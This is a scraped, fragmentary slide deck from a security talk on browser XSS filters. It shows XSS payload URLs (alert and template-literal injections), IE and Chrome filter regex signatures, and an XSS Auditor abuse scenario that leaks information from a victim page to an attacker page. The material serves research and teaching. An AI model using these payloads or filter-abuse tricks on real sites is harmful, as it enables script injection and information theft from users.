XSSフィルターの使い方/ Shibuya.XSS techtalk #9

View Slide

❶
➌
❷
❹

View Slide

View Slide

https://example.com/?q=">

">

View Slide

https://addons.mozilla.org/ja/firefox/addon/noscript/

View Slide

HTTP/1.1 200 OK
Date: Tue, 28 Mar 2017 06:16:00 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

View Slide

View Slide

https://example.com/#5382863726995448701

">
">

View Slide

View Slide

">


View Slide

https://example.com/#5382863726995448701

View Slide

if(jQuery){ // Expected }else{ // ??? } 
https://example.com/?

View Slide

View Slide

{{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{$}.*?{$}}
[...]
{(v|(?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(?0
*((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(?0*((83)|(53)
|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(?0*((67)|(43)|(99)|(63)
);?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(?0*((82)|(52)|(114)|(72));?))([\t]|
(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9
|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|
A|D);?)|(tab;)|(newline;))))*(t|(?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta
b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}
{{}
{{[...]
{{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}
{[...]
">

View Slide

[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.
">

View Slide

">
[\"\'][ ]*(([^a-z0-
9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee]))
)).+?{$}.*?{$}
x="";alert(1)//"

View Slide

View Slide

https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-
2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
http://d.hatena.ne.jp/teracc/20090622

View Slide

https://www.slideshare.net/masatokinugawa/xxn-ja

View Slide

[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
.+?[.].+?=
 q = "";document#body.innerHTML="<xss>"; 
URL: ?q=";document.body.innerHTML="

View Slide

[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
.+?[.].+?=
 <script src="//example.co.jp/test.js" type="text/javascript"> 
URL: ?"/++.+++=

View Slide

"style=:\
javascript:-
vbscript:-
vbs:-
",x[]=
"{toString:
"{valueOf:

View Slide

type="text/javascript">

View Slide

window#name//Syntax Error
window^name//Syntax OK
window.name 

View Slide

View Slide

url=location.search.slice(1);
if(url^indexOf(":")!=-1){
url=null;
}
onload=function(){
if(url){location=url;}
}

View Slide

https://example.com/?q=";alert`1`//

 q = "";alert`1`//"; 
https://www.slideshare.net/x00mario/es6-en/34
ECMAScript 6 from an Attacker's Perspective
- Breaking Frameworks, Sandboxes, and everything else

View Slide

https://example.com/?q=${alert(1)}``//&`+++`

https://example.com/?q=[USER_INPUT]

 foo=``; q="[USER_INPUT]"; 
 foo=`#; q="${alert(1)}#`//"; 

View Slide

https://example.com/?+onfiles+++=.

type="text/javascript">

[...]

View Slide

https://bugs.chromium.org/p/chromium/issues/detail?id=654794

View Slide

View Slide

http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html

View Slide

https://VICTIM/
https://VICTIM/?

IFRAME ERROR
https://ATTACKER/

win=window.open(…) if(win.length == 0){
//
//
}else{
//
}
…

View Slide







View Slide

https://www.youtube.com/watch?v=IMDWjKFbsJE

View Slide

HTTP/1.1 200 OK
[...]
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

View Slide

https://accounts.google.com/ServiceLogin?

View Slide

google.ae
google.as
google.ca
google.co
google.co.in
google.co.jp
google.co.kr
google.co.nz
google.co.uk
google.com.br
google.com.mx
google.de
google.es
google.fr
google.it
google.pl
google.pt
google.ru
...(

View Slide

✨
✨
✨

View Slide

{

View Slide

0
1
2
3
4
5
6
7
8
9
10
https://example.com/

View Slide

0
1
2
3
4
5
6
7
8
9
10
https://example.com/?

View Slide

0x01-08 0x0E-1F
!"$%'()*;=^`|~
0x09-0D 0x20 +
&
>
#,/:?[\]{}
-.@_
A a
0x00
0-9 <
B-Z b-z

View Slide

[email protected]
{[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

View Slide

✔
✔
✔
✔

View Slide

[email protected]

View Slide

https://www.google.co.jp/?"[email protected]=

View Slide

https://www.google.de/?"[email protected]=
https://www.google.ru/?"[email protected]=

View Slide

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

Masato Kinugawa

More Decks by Masato Kinugawa

Other Decks in Technology

Featured

Transcript